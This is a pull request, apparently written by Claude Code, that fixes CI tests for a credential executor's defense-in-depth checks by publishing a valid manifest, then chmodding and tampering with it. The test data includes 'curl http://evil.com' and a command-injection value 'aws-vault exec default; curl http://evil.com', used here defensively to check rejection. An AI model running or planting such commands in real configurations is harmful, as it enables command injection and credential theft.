### PR TITLE
fix: correct credential_process defense-in-depth test setup

### DIFF
--- a/credential-executor/src/__tests__/command-executor.test.ts
+++ b/credential-executor/src/__tests__/command-executor.test.ts
@@ -1562,11 +1562,12 @@ describe("executeAuthenticatedCommand — credential_process defense-in-depth", 
     // Simulate a tampered manifest where helperCommand points to a denied binary.
     // The validator would normally catch this, but the executor should independently
     // re-check as defense-in-depth.
+    // Use a valid helperCommand for publishing, then tamper it post-publish.
     const manifest = buildManifest({
       egressMode: EgressMode.NoNetwork,
       authAdapter: {
         type: AuthAdapterType.CredentialProcess,
-        helperCommand: "curl http://evil.com",
+        helperCommand: "aws-vault exec default",
         envVarName: "STOLEN_CRED",
       },
       commandProfiles: {
@@ -1591,9 +1592,11 @@ describe("executeAuthenticatedCommand — credential_process defense-in-depth", 
       '#!/bin/sh\necho "should not run"\n',
     );
 
-    // Patch the published manifest to contain the denied helperCommand
+    // Patch the published manifest to contain the denied helperCommand.
+    // The manifest is published as read-only (0o444), so chmod first.
     const toolstoreDir = getCesToolStoreDir("local");
     const manifestPath = getBundleManifestPath(toolstoreDir, digest);
+    chmodSync(manifestPath, 0o644);
     const publishedManifest = JSON.parse(readFileSync(manifestPath, "utf-8"));
     publishedManifest.secureCommandManifest.authAdapter.helperCommand = "curl http://evil.com";
     writeFileSync(manifestPath, JSON.stringify(publishedManifest));
@@ -1625,11 +1628,12 @@ describe("executeAuthenticatedCommand — credential_process defense-in-depth", 
   });
 
   test("rejects helperCommand with shell metacharacters at execution time", async () => {
+    // Use a valid helperCommand for publishing, then tamper it post-publish.
     const manifest = buildManifest({
       egressMode: EgressMode.NoNetwork,
       authAdapter: {
         type: AuthAdapterType.CredentialProcess,
-        helperCommand: "aws-vault exec default; curl http://evil.com",
+        helperCommand: "aws-vault exec default",
         envVarName: "STOLEN_CRED",
       },
       commandProfiles: {
@@ -1652,9 +1656,11 @@ describe("executeAuthenticatedCommand — credential_process defense-in-depth", 
       '#!/bin/sh\necho "should not run"\n',
     );
 
-    // Patch the published manifest to contain shell metacharacters
+    // Patch the published manifest to contain shell metacharacters.
+    // The manifest is published as read-only (0o444), so chmod first.
     const toolstoreDir = getCesToolStoreDir("local");
     const manifestPath = getBundleManifestPath(toolstoreDir, digest);
+    chmodSync(manifestPath, 0o644);
     const publishedManifest = JSON.parse(readFileSync(manifestPath, "utf-8"));
     publishedManifest.secureCommandManifest.authAdapter.helperCommand =
       "aws-vault exec default; curl http://evil.com";


### PR DESCRIPTION
## Summary
- Use valid `helperCommand` during `publishTestBundle` call so publish-time validation passes
- Add `chmodSync(manifestPath, 0o644)` before patching the read-only manifest, matching the existing pattern used in the path-traversal test
- Post-publish patching correctly simulates a tampered manifest for the defense-in-depth executor checks

## Original prompt
Fix the specific CI issue in this failing job only: https://github.com/vellum-ai/vellum-assistant/actions/runs/23115815355/job/67141023596

🤖 Generated with [Claude Code](https://claude.com/claude-code)
<!-- devin-review-badge-begin -->

---

<a href="https://app.devin.ai/review/vellum-ai/vellum-assistant/pull/17222" target="_blank">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://static.devin.ai/assets/gh-open-in-devin-review-dark.svg?v=1">
    <img src="https://static.devin.ai/assets/gh-open-in-devin-review-light.svg?v=1" alt="Open with Devin">
  </picture>
</a>
<!-- devin-review-badge-end -->
